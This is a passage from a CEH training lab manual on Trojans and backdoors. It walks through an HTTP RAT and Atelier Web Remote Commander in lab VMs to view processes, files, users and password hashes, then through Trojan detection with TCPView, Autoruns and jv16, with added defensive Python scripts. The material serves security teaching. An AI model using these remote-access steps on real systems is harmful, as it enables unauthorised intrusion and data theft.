11. Go to Windows Server 2008 and open a web browser to access the Windows 8 machine (here "10.0.0.12" is the IP address of the Windows 8 machine).
  • 36. FIGURE 5.10: Access the backdoor in the host web browser (page title: "welcome 2 HTTP_RAT infected computer"; links: running processes, browse, computer info, stop httprat, have suggestions?, homepage)
12. Click running processes to list the processes running on the Windows 8 machine.
FIGURE 5.11: Process list of the victim computer
13. You can kill any running process from here.
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
  • 37. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Tool/Utility: HTTP Trojan
Information Collected/Objectives Achieved: Successfully sent httpserver.exe to the victim machine.
Output: Killed processes: System, smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, dwm.exe, splwow64.exe, httpserver.exe, firefox.exe
Questions
1. Determine the ports that the HTTP proxy server Trojan uses to communicate.
Internet Connection Required: [ ] Yes [x] No
Platform Supported: [x] Classroom [x] iLabs
  • 38. Lab 4: Remote Access Trojans Using Atelier Web Remote Commander
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Lab Scenario
A backdoor Trojan is a very dangerous infection that compromises the integrity of a computer, its data, and the personal information of its users. Remote attackers use backdoors as a means of accessing and taking control of a computer while bypassing its security mechanisms. Trojans and backdoors are types of malware; their main purpose is to send and receive data, and especially commands, through a port to another system. This port can be a well-known port such as 80 or an unusual port such as 7777. Trojans are most of the time disguised as legitimate and harmless applications to encourage the user to execute them.
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors.
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of this lab include:
• Gain access to a remote computer
• Acquire sensitive information of the remote computer
Lab Environment
To carry out this lab, you need:
1. Atelier Web Remote Commander, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Atelier Web Remote Commander
  • 39. ■ A computer running Windows Server 2008 (host)
■ Windows Server 2003 running in Virtual Machine
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools
Lab Duration
Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and their appearance may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.
TASK 1: Atelier Web Remote Commander
Lab Tasks
1. Install and launch Atelier Web Remote Commander (AWRC) in Windows Server 2012.
2. To launch Atelier Web Remote Commander (AWRC), open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
FIGURE 6.1: Windows Server 2012 Start-Desktop
3. Click AW Remote Commander Professional in the Start menu apps.
  • 40. FIGURE 6.2: Windows Server 2012 Start Menu Apps
4. The main window of AWRC will appear as shown in the following screenshot.
Note: This tool is used to gain access to all the information of the remote system.
FIGURE 6.3: Atelier Web Remote Commander main window
5. Input the IP address and User name / Password of the remote computer.
6. In this lab we have used Windows Server 2008 (10.0.0.13):
■ User name: Administrator
■ Password: qwerty@123
Note: The IP addresses and credentials might differ in your labs.
7. Click Connect to access the machine remotely.
  • 41. FIGURE 6.4: Providing remote computer details
8. The following screenshots show that you will be accessing the Windows Server 2008 remotely.
FIGURE 6.5: Remote computer accessed (Progress Report: "Initializing, please wait..." followed by "Connected to 10.0.0.13")
9. The Commander is connected to the remote system. Click the SysInfo tab to view complete details of the Virtual Machine.
  • 42. FIGURE 6.6: Information of the remote computer
10. Select NetworkInfo, where you can view network information (shares such as ADMIN$, C$ and IPC$ with their path, remark and permissions).
FIGURE 6.7: Information of the remote computer
11. Select the File System tab. Select c: from the drop-down list and click Get.
12. This tab lists the complete files of the C: drive of Windows Server 2008.
  • 43. FIGURE 6.8: Information of the remote computer (File System tab: contents of c:, file system NTFS, capacity and free space)
13. Select Users and Groups, which will display the complete user details.
FIGURE 6.9: Information of the remote computer (Users and Groups tab: user information for Administrator, including privilege level, last logon, user ID (RID) 500 and SID)
  • 44. FIGURE 6.10: Information of the remote computer (Groups tab: group names with SIDs and comments)
FIGURE 6.11: Information of the remote computer
14. This tool will display all the details of the remote system.
15. Analyze the results of the remote computer.
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
  • 45. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Tool/Utility: Atelier Web Remote Commander
Information Collected/Objectives Achieved: Remotely accessing Windows Server 2008
Result:
• System information of remote Windows Server 2008
• Network information path of remote Windows Server 2008
• Viewing complete files of c: of remote Windows Server 2008
• User and Groups details of remote Windows Server 2008
• Password hashes
Questions
1. Evaluate the ports that AWRC uses to perform operations.
2. Determine whether it is possible to launch AWRC from the command line and make a connection. If yes, then illustrate how it can be done.
Internet Connection Required: [ ] Yes [x] No
Platform Supported: [x] Classroom
  • 46. Detecting Trojans
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Lab Scenario
Most individuals are confused about the possible ways to remove a Trojan virus from a specific system. One must realize that the World Wide Web is one of the tools that transmits information as well as malicious and harmful viruses. A backdoor Trojan can be extremely harmful if not dealt with appropriately. The main function of this type of virus is to create a backdoor in order to access a specific system. With a backdoor Trojan attack, a concerned user is unaware of the possible effects until sensitive and important information is found missing from the system. With a backdoor Trojan attack, a hacker can also perform other types of malicious attacks. The other name for backdoor Trojans is remote access Trojans. The main reason backdoor Trojans are so dangerous is that they hold the ability to access a particular machine remotely (source: http://www.combofix.org).
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
• Analyze using Port Monitor
• Analyze using Process Monitor
• Analyze using Registry Monitor
• Analyze using Startup Program Monitor
• Create MD5 hash files for Windows directory files
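The last objective, creating hash files for Windows directory files and checking them later, as an added example that is not part of the lab and is not the Fsum Frontend tool: a manifest of a directory tree is written once, and a later scan is compared against it to list added, removed and modified files. The directory it scans is constructed in a temporary folder, and the file names in it (dns.exe, svchost.exe, httpserver.exe, notepad.exe) are sample values, not real binaries.

```python
"""File-integrity baseline for a directory tree.

Added example, not part of the lab and not the Fsum Frontend tool. A manifest
of "<hash>  <relative path>" lines is written from a clean system; a later
scan is compared against it to find files that were added, removed or changed.
The lab uses MD5, the default here; pass algo="sha256" for new baselines, since
MD5 collision attacks are practical.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def hash_file(path, algo="md5", chunk_size=1 << 16):
    """Stream a file through the digest so large binaries are not read at once."""
    digest = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root, algo="md5"):
    """Map every file under root (relative POSIX-style path) to its digest."""
    root = Path(root)
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            try:
                manifest[full.relative_to(root).as_posix()] = hash_file(full, algo)
            except OSError:
                continue  # locked or unreadable file (common under Windows); skip
    return manifest


def write_manifest(manifest, out_path):
    """Persist as 'hash  path' lines, the layout md5sum-style tools use."""
    with open(out_path, "w", encoding="utf-8") as fh:
        for rel in sorted(manifest):
            fh.write(f"{manifest[rel]}  {rel}\n")


def read_manifest(in_path):
    manifest = {}
    with open(in_path, encoding="utf-8") as fh:
        for line in fh:
            line = line.rstrip("\n")
            if line:
                digest, rel = line.split("  ", 1)
                manifest[rel] = digest
    return manifest


def compare_manifests(baseline, current):
    """Return sorted lists of added, removed and modified paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario in a temp folder: baseline a small tree, then plant a
    new binary, alter an existing one and delete a third, and report the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = Path(tmp) / "windows"
        (tree / "system32").mkdir(parents=True)
        (tree / "system32" / "dns.exe").write_bytes(b"sample dns binary")
        (tree / "system32" / "svchost.exe").write_bytes(b"sample svchost binary")
        (tree / "notepad.exe").write_bytes(b"sample notepad binary")
        baseline_path = Path(tmp) / "baseline.md5"  # kept outside the scanned tree
        write_manifest(build_manifest(tree), baseline_path)

        # Simulated compromise: dropped server, replaced system file, deleted file.
        (tree / "system32" / "httpserver.exe").write_bytes(b"dropped backdoor server")
        (tree / "system32" / "svchost.exe").write_bytes(b"replaced svchost binary")
        (tree / "notepad.exe").unlink()

        return compare_manifests(read_manifest(baseline_path), build_manifest(tree))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```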
  • 47. Lab Environment
To carry out this lab, you need:
■ TCPView, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView
■ Autoruns, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns
■ PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and Backdoors\Process Monitor Tool\PrcView
■ jv16 PowerTools, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012
■ Fsum Frontend, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend
■ A computer running Windows Server 2008 (host)
■ Windows Server 2003 running in Virtual Machine
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools
Note (Autoruns, Disabling and Deleting Entries): If you don't want an entry to activate the next time you boot or log in, you can either disable or delete it. To disable an entry, uncheck it. Autoruns will store the startup information in a backup location so that it can reactivate the entry when you recheck it. For items stored in startup folders, Autoruns creates a subfolder named Autoruns disabled. Check a disabled item to re-enable it.
Lab Duration
Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and their appearance may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.
Lab Tasks
TASK 1: TCPView
1. Go to the Windows Server 2012 Virtual Machine.
2. Install TCPView from the location D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView.
3. The TCPView main window appears, with details such as Process, Process ID, Protocol, Local Address, Local Port, Remote Address, and Remote Port.
  • 48. FIGURE 8.1: TCPView main window (dns.exe, PID 1572, with its TCP and UDP sockets on local ports such as domain and the 49xxx range)
Note (Autoruns): You should delete items that you do not wish to ever execute. Do so by choosing Delete in the Entry menu. Only the currently selected item will be deleted.
4. The tool performs port monitoring.
FIGURE 8.2: TCPView main window (svchost.exe and System entries with local ports such as bootps, bootpc, isakmp, llmnr, netbios-ssn, microsoft-ds, http and https)
Note (Autoruns): If you are running Autoruns without administrative privileges on Windows Vista and attempt to change the state of a global entry, you'll be denied access.
5. Now it is analyzing the SMTP and other ports.
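The port-monitoring steps above read the TCPView listing by eye. The following added example (not part of the lab and not a Sysinternals tool) does the same triage as a script: a constructed TCPView-style snapshot is parsed and every listening TCP socket is checked against a hypothetical allowlist of the process expected to own each port, so a server such as the httpserver.exe from the earlier lab stands out. The SERVICE_PORTS table, the EXPECTED_LISTENERS allowlist, the host name and the process updater.exe in the sample are assumptions.

```python
"""Triage of a TCPView-style port snapshot.

Added example, not part of the lab and not a Sysinternals tool. Rows follow the
column order TCPView displays: Process, PID, Protocol, Local Address, Local
Port, Remote Address, Remote Port and (for TCP) State. Service names are
resolved to port numbers and every LISTENING TCP socket is compared with an
allowlist of the processes expected to own that port.
"""
from collections import namedtuple

Socket = namedtuple(
    "Socket",
    "process pid proto local_addr local_port remote_addr remote_port state",
)

# Service names TCPView prints in place of numbers (subset of the Windows
# services file; extend as needed). Assumed mapping for this example.
SERVICE_PORTS = {
    "domain": 53, "bootps": 67, "bootpc": 68, "http": 80, "epmap": 135,
    "netbios-ssn": 139, "https": 443, "microsoft-ds": 445, "isakmp": 500,
    "ssdp": 1900, "ms-wbt-server": 3389, "ipsec-msft": 4500, "llmnr": 5355,
}

# Hypothetical allowlist: which image is expected to own each listening port
# on this host. Derive yours from a known-clean snapshot of the same machine.
EXPECTED_LISTENERS = {
    53: {"dns.exe"}, 80: {"System"}, 135: {"svchost.exe"}, 139: {"System"},
    443: {"System"}, 445: {"System"}, 3389: {"svchost.exe"},
}

# Ports at or above this value are the Windows dynamic range; RPC servers such
# as svchost.exe legitimately listen there, so they are not judged by port.
DYNAMIC_PORT_START = 49152


def port_number(token):
    """'domain' -> 53, '49157' -> 49157; an unknown service name gives None."""
    if token.isdigit():
        return int(token)
    return SERVICE_PORTS.get(token.lower())


def parse_snapshot(text):
    """Turn whitespace-separated snapshot lines into Socket records.

    UDP rows carry no State column in TCPView, so a 7-field row gets state ''.
    """
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) == 7:
            parts.append("")
        if len(parts) != 8:
            continue  # malformed line
        rows.append(Socket(*parts))
    return rows


def unexpected_listeners(rows):
    """Return (process, pid, port, reason) for TCP listeners the allowlist does
    not explain, in snapshot order."""
    findings = []
    for s in rows:
        if s.proto.upper() != "TCP" or s.state.upper() != "LISTENING":
            continue
        port = port_number(s.local_port)
        if port is None:
            findings.append((s.process, s.pid, s.local_port, "unknown service name"))
        elif port in EXPECTED_LISTENERS:
            if s.process not in EXPECTED_LISTENERS[port]:
                expected = ", ".join(sorted(EXPECTED_LISTENERS[port]))
                findings.append((s.process, s.pid, port,
                                 f"not an expected owner of port {port} "
                                 f"(expected: {expected})"))
        elif port < DYNAMIC_PORT_START:
            findings.append((s.process, s.pid, port,
                             f"no baseline listener on port {port}"))
    return findings


# Constructed snapshot modelled on the lab screenshots. httpserver.exe on http
# and the invented updater.exe on 7777 are the planted anomalies.
SAMPLE_SNAPSHOT = """
dns.exe 1572 TCP WIN-2N9STOSGIEN domain WIN-2N9STOSGIEN 0 LISTENING
svchost.exe 852 TCP WIN-2N9STOSGIEN epmap WIN-2N9STOSGIEN 0 LISTENING
svchost.exe 1036 TCP WIN-2N9STOSGIEN 49157 WIN-2N9STOSGIEN 0 LISTENING
System 4 TCP WIN-2N9STOSGIEN https WIN-2N9STOSGIEN 0 LISTENING
System 4 TCP WIN-2N9STOSGIEN microsoft-ds WIN-2N9STOSGIEN 0 LISTENING
httpserver.exe 2240 TCP WIN-2N9STOSGIEN http WIN-2N9STOSGIEN 0 LISTENING
updater.exe 3120 TCP WIN-2N9STOSGIEN 7777 WIN-2N9STOSGIEN 0 LISTENING
svchost.exe 1524 UDP WIN-2N9STOSGIEN bootps * *
firefox.exe 2804 TCP WIN-2N9STOSGIEN 49213 10.0.0.12 http ESTABLISHED
"""

if __name__ == "__main__":
    for process, pid, port, reason in unexpected_listeners(parse_snapshot(SAMPLE_SNAPSHOT)):
        print(f"{process} (PID {pid}) port {port}: {reason}")
```

The dynamic-range cut-off is a triage heuristic, not a verdict: a listener above 49152 owned by an unfamiliar image still deserves a look at its image path and signature.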
  • 49. Note (Autoruns): Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights. You can also use the -e command-line option to launch Autoruns with administrative rights from the start.
Note (Autoruns): There are several ways to get more information about an autorun location or entry. To view a location or entry in Explorer or Regedit, choose Jump To in the Entry menu or double-click the entry's or location's line in the display.
FIGURE 8.3: TCPView analyzing ports
You can also kill a process by double-clicking that process and then clicking the End Process button.
FIGURE 8.4: Killing processes (Properties for dns.exe: 1572, Domain Name System (DNS) Server, Microsoft Corporation, Version 6.02.8400.0000, Path C:\Windows\System32\dns.exe)
TASK 2: Autoruns
Go to the Windows Server 2012 Virtual Machine. Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns. It lists all processes, DLLs, and services.
  • 50. FIGURE 8.5: Autoruns main window (Everything tab: entries under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AppSetup, HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run, each with description, publisher and image path)
Note (Autoruns): You can view Explorer's file properties dialog for an entry's image file by choosing Properties in the Entry menu. You can also have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.
Note (Autoruns): Simply run Autoruns and it shows you the currently configured auto-start applications in the locations that most directly execute applications.
Note (Autoruns): Perform a new scan that reflects changes to options by refreshing the display.
Note (Autoruns): Internet Explorer: this entry shows Browser Helper Objects (BHOs), Internet Explorer toolbars and extensions.
10. The following is the detailed list on the Logon tab.
FIGURE 8.9: Autoruns Logon list
11. The following are the Explorer list details.
  • 51. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs O Autoruns [WIN-2N9STOSGIENAdministrator] ‫ ־‬Sysinternals: www.sysinter...L File Entry | Codecs Services All Windows services configured to start automaticallywhen the systemboots. Options | 3 User Boot Execute Winsock Providers | & Z ? Everything | ^ Help | 3 1 Print Monitors * Logon[ ,j Explorer Image H^acks | £ | '■ Applnit > LSA Providers | | ' KnownDLLs ] Network Providers | Internet Explorer | J Scheduled Tasks | A W nbgon Sidebar Gadgets Services | Drivers Autorun Entry Description Publisher Image Path HKLMS 0 FTWAR EClassesProtocoisF*er 0 ^ te x t/x m l Microsoft Office XML MIME... Microsoft Corporation c:programfilescommonfi.. • iff HKLMS oftwareClassesx heC xVContextMenuHandlers S 0 ^ SnagltMainSh... Snagit Shell Extension DLL TechSmith Corporationc:program files (x86 )techs.. 0 fo‫־‬ WinRAR WinRAR shel extension Alexander Roshal c:programfileswinrarrare. HKLM S 0ftwareW0w6432N0deClassesx helE xContextM enuH andlers S 0 SnagltMainSh. Snagit Shell Extension DLL TechS mith Corporation c:program files (x86 )techs.. 0 *V WinRAR32 WinRAR shel extension Alexander Roshal c:programfileswinrarrare. HKLM S oftwareClassesD »ectoryS heMExSContextM enuH andlers 0 SnagltMainSh Snagit Shell Extension DLL TechS mith Corporation Ready c:program files (x8S)techs. Windows Entries Hidden. FIGURE 8 0 AutoninsExplorer list .1 : 12. T lie follow ing are die Service s list details. O Autoruns [WIN-2N9STOSGIENAdministrator] - Sysinternals: www.sysinter...L File *J Entry & H (3 Drivers This displays all 3 kernel-m drivers ode registered on tlie system except those that are disabled & Codecs Options User | ‫־־‬I Boot Execute fc?; Winsock Providers | O Help B X * Everything | ^ ] 3 & Print Monitors Logon | Image hijacks Explow [ j | [^ Applnit LSA Providers Internet Explorer f | S cheduled Tasks | Publisher Autorun Entry Description g HKLMSystemCurrentControlSetServices 0 [ 1 ‫ י‬AdobeFlashPta This service keeps you Ad... 
The Services tab in the screenshot lists entries under HKLM\System\CurrentControlSet\Services such as AdobeFlashPlayerUpdateSvc (Adobe Systems Incorporated), c2wts (Microsoft Corporation), EMP_UDSA (SEIKO EPSON CORPORATION), MozillaMaintenance (Mozilla Foundation), ose, osppsvc and WSusCertServer (Microsoft Corporation), with their image paths.

FIGURE 8.11: Autoruns Services list.

13. The following are the Drivers list details.
  • 52. The Drivers tab lists kernel-mode drivers registered under HKLM\System\CurrentControlSet\Services, for example 3ware, adp94xx, adpahci, adpu320 (Adaptec), amdsata, amdsbs, amdxata (Advanced Micro Devices) and arcsas (PMC-Sierra), all loaded from c:\windows\system32\drivers.

FIGURE 8.12: Autoruns Drivers list.

Autoruns note: Scheduled Tasks shows Task Scheduler tasks configured to start at boot or logon.

14. The following is the KnownDLLs list in Autoruns. The entries shown under HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls are _Wow64, Wow64cpu and Wow64win, each reported as "File not found: C:\Windows...".
FIGURE 8.13: Autoruns KnownDLLs list.

TASK 4: jv16 PowerTools

15. Install and launch jv16 PowerTools in Windows Server 2012 (host machine).

16. jv16 PowerTools is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.

17. To launch jv16 PowerTools, open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
  • 53. FIGURE 7.1: Windows Server 2012 Start-Desktop.

18. Click jv16 PowerTools 2012 in the Start menu apps.

Autoruns note: Winlogon Notifications shows DLLs that register for Winlogon notification of logon events.

FIGURE 7.2: Windows Server 2012 Start Menu Apps.

19. Click the Clean and fix my computer icon.

Autoruns note: Winsock Providers shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can uninstall them, but cannot disable them.
  • 54. The jv16 PowerTools 2012 Home page (trial limitation in effect, 60 days left) offers Registry Tools, File Tools, System Tools, Privacy Tools, Backups, Action History and Settings, plus shortcuts such as Clean and fix my computer, Fully remove software and leftovers, Speed up my computer, Immunize my computer, Verify my downloads are safe to run and Control which programs start automatically. Its log reports a health score of 95 out of 100 for the computer and 92 out of 100 for the Windows registry.

FIGURE 8.20: jv16 Home page.

20. The Clean and fix my computer dialog box appears. Click the Settings tab and then click the Start button. The Settings tab lets you emphasize safety over scan speed and the number of found errors, or emphasize the number of found errors and speed over safety and accuracy; the selected setting here is the normal system scan policy, in which all Windows-related data is skipped for additional safety and only old temp files are listed.
  • 55. Autoruns note: LSA Providers shows registered Local Security Authority (LSA) authentication, notification and security packages.

FIGURE 8.21: jv16 Clean and fix my computer dialog.

21. It will analyze your system for files; this will take a few minutes.

Autoruns note: Print Monitors displays DLLs that load into the print spooling service. Malware has used this support to autostart itself.

FIGURE 8.22: jv16 Clean and fix my computer - Analyzing.

22. Computer items will be listed after the complete analysis. In this run the scan reported 7 registry errors (invalid file or directory references), 266 items of registry junk (4 obsolete software entries, 146 useless empty keys and 116 useless file extensions) and 23 start menu and desktop items, 296 items in total.

Autoruns note: You can save the results of a scan with File->Save and load a saved scan with File->Load. These commands work with native Autoruns file formats, but you can use File->Export to save a text-only version of the scan results. You can also automate the generation of native Autoruns export files with command-line options.

FIGURE 8.24: jv16 Clean and fix my computer - Item details.

23. Selected item details are as follows.

Autoruns note: Sidebar Gadgets displays Windows sidebar gadgets.
  • 56. Autoruns note: Compare the current Autoruns display with previous results that you have saved. Select File|Compare and browse to the saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted items.

FIGURE 8.23: jv16 Clean and fix my computer - Items.

24. The Registry junk section provides details for selected items (for example obsolete software entries under HKCU\Software and HKUS\S-1-5-..., and useless empty keys under HKCR, each with a severity percentage).

Autoruns note: If you are running Autoruns without administrative privileges on Windows Vista and attempt to change the state of a global entry, you will be denied access. Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights.

FIGURE 8.25: jv16 Clean and fix my computer - Item registry junk.

25. Select all check boxes in the item list and click Delete.
A dialog box appears. Click Yes.

Autoruns note: Unless the Include Empty Locations selection in the Options menu is checked, Autoruns doesn't show locations with no entries.
  • 57. The confirmation dialog reads: "You are about to delete a lot of erroneous registry data. Using the Fix option is always the better option. Are you sure you know what you are doing and want to proceed?"

FIGURE 8.26: jv16 Clean and fix my computer - Item check box.

26. Go to the Home tab, and click the Control which programs start automatically icon.
  • 58. Autoruns note: The Verify Signatures option appears in the Options menu on systems that support image signing verification and can result in Autoruns querying certificate revocation list (CRL) web sites to determine if image signatures are valid.

FIGURE 8.28: jv16 Control which programs start automatically.

27. Check programs in Startup Manager, and then select the appropriate action. In the screenshot the Startup Manager lists entries such as jusched.exe (Java Update Scheduler), googletalk.exe, EMP_UD.exe (EPSON USB Display), Reader_sl.exe, AdobeARM.exe, igfxtray.exe, hkcmd.exe and igfxpers.exe, each with its file name, command line, the registry location it was loaded from (HKEY_LOCAL_MACHINE), whether the process is running, and its PID, thread count, priority and memory usage.

Autoruns note: The Hide Microsoft Entries selection omits images that have been signed by Microsoft if Verify Signatures is selected, and omits images that have Microsoft in their resource's company name field if Verify Signatures is not selected.

FIGURE 8.29: jv16 Startup Manager dialog.

28. Click the Registry Tools menu to view the registry tools.

Autoruns note: Use the Hide Microsoft Entries or Hide Windows Entries options in the Options menu to help you identify software that has been added to a system since installation.
Autoruns note: Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file that is trusted by the system.

The Registry Tools page offers Registry Manager, Registry Finder, Registry Find & Replace, Registry Compactor, Registry Information, Registry Monitor and Registry Cleaner.

FIGURE 8.30: jv16 Registry tools.

29. Click File Tools to view the file tools.
  • 59. Autoruns note: The Hide Windows Entries option omits images signed by Windows if Verify Signatures is selected. If Verify Signatures is not selected, Hide Windows Entries omits images that have Microsoft in their resource's company name field and that reside beneath the %SystemRoot% directory.

FIGURE 8.31: jv16 File tools.

30. Click System Tools to view the system tools. The System Tools page offers Software Uninstaller, Startup Manager, Service Manager, Start Menu Tool, Automation Tool and System Optimizer.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors.

FIGURE 8.32: jv16 System tools.
  • 60.

31. Click Privacy Tools to view the privacy tools (History Cleaner and Disk Wiper).

FIGURE 8.33: jv16 Privacy tools.

32. Click Backups in the menu to display the Backup Tool dialog box. It lists the backups jv16 created before making changes (here a "Clean and fix" file backup of 34.6 KB, ID 00062D, created 21.09.2012), so registry data removed in step 25 can be restored.

FIGURE 8.34: jv16 Backup tool.
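The Autoruns notes above describe saving a scan, exporting it from the command line, and using File|Compare to see new items in green (deleted items are not shown), plus the "(Not verified)" prefix on images whose signature cannot be verified. The following Python script is an added example, not part of the lab or of Sysinternals' own tooling: it diffs two autorunsc CSV exports and reports new, removed and unverified entries. It assumes the exports were produced by autorunsc with CSV output and that the header includes the columns Entry Location, Entry, Image Path and Signer (extra columns are ignored); the two exports embedded below are constructed sample data, not real output.

```python
"""Diff two Autoruns CSV exports and flag entries Autoruns could not verify."""
import csv
import io

# Fields that identify one autostart entry across two exports.
# Column names follow autorunsc's CSV header (assumption); extra columns
# such as Time, Enabled, Category or Company are simply ignored.
KEY_FIELDS = ("Entry Location", "Entry", "Image Path")

# Constructed sample exports, not real autorunsc output. The baseline is the
# "saved" scan; the current export was taken later on the same host.
BASELINE_CSV = r"""Entry Location,Entry,Image Path,Signer
HKLM\System\CurrentControlSet\Services,AdobeFlashPlayerUpdateSvc,c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe,(Verified) Adobe Systems Incorporated
HKLM\System\CurrentControlSet\Services,ose,c:\program files (x86)\common files\microsoft shared\source engine\ose.exe,(Verified) Microsoft Corporation
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers,WinRAR,c:\program files\winrar\rarext.dll,(Not verified) Alexander Roshal
"""

CURRENT_CSV = r"""Entry Location,Entry,Image Path,Signer
HKLM\System\CurrentControlSet\Services,AdobeFlashPlayerUpdateSvc,c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe,(Verified) Adobe Systems Incorporated
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers,WinRAR,c:\program files\winrar\rarext.dll,(Not verified) Alexander Roshal
HKLM\Software\Microsoft\Windows\CurrentVersion\Run,updater,c:\users\administrator\appdata\roaming\updater.exe,(Not verified)
HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls,_wow64,File not found: C:\Windows\SysWOW64\wow64.dll,
"""


def parse_autoruns_csv(text):
    """Return {(location, entry, image path): row} for one export."""
    rows = {}
    for row in csv.DictReader(io.StringIO(text)):
        rows[tuple(row[f].strip() for f in KEY_FIELDS)] = row
    return rows


def is_unverified(row):
    """True when the Signer field carries Autoruns' '(Not verified)' prefix
    or is empty (no signature could be checked at all)."""
    signer = (row.get("Signer") or "").strip()
    return signer == "" or signer.startswith("(Not verified)")


def compare_exports(baseline_text, current_text):
    """Diff two exports. Unlike File|Compare in the GUI, which only colours
    new items green, this also reports entries that disappeared."""
    base = parse_autoruns_csv(baseline_text)
    cur = parse_autoruns_csv(current_text)
    added = sorted(k for k in cur if k not in base)
    removed = sorted(k for k in base if k not in cur)
    unverified = sorted(k for k, r in cur.items() if is_unverified(r))
    return {"added": added, "removed": removed, "unverified": unverified}


def report(result):
    """Human-readable summary of compare_exports()."""
    lines = []
    for label in ("added", "removed", "unverified"):
        lines.append(f"{label} ({len(result[label])}):")
        for loc, entry, image in result[label]:
            lines.append(f"  {entry} @ {loc} -> {image}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(compare_exports(BASELINE_CSV, CURRENT_CSV)))
```

Run it against two real exports by reading the files into strings first; check the encoding autorunsc used when it wrote them before decoding. A new Run-key entry whose signer is "(Not verified)" and whose image lives under a user profile is exactly the kind of item the lab's "Hide Microsoft Entries" and "Verify Signatures" options are meant to surface.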
  • 61.

33. Go to the Windows Server 2012 Virtual Machine.

TASK 5: Fsum FrontEnd

34. Double-click Fsum FrontEnd.exe, the executable file located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend.

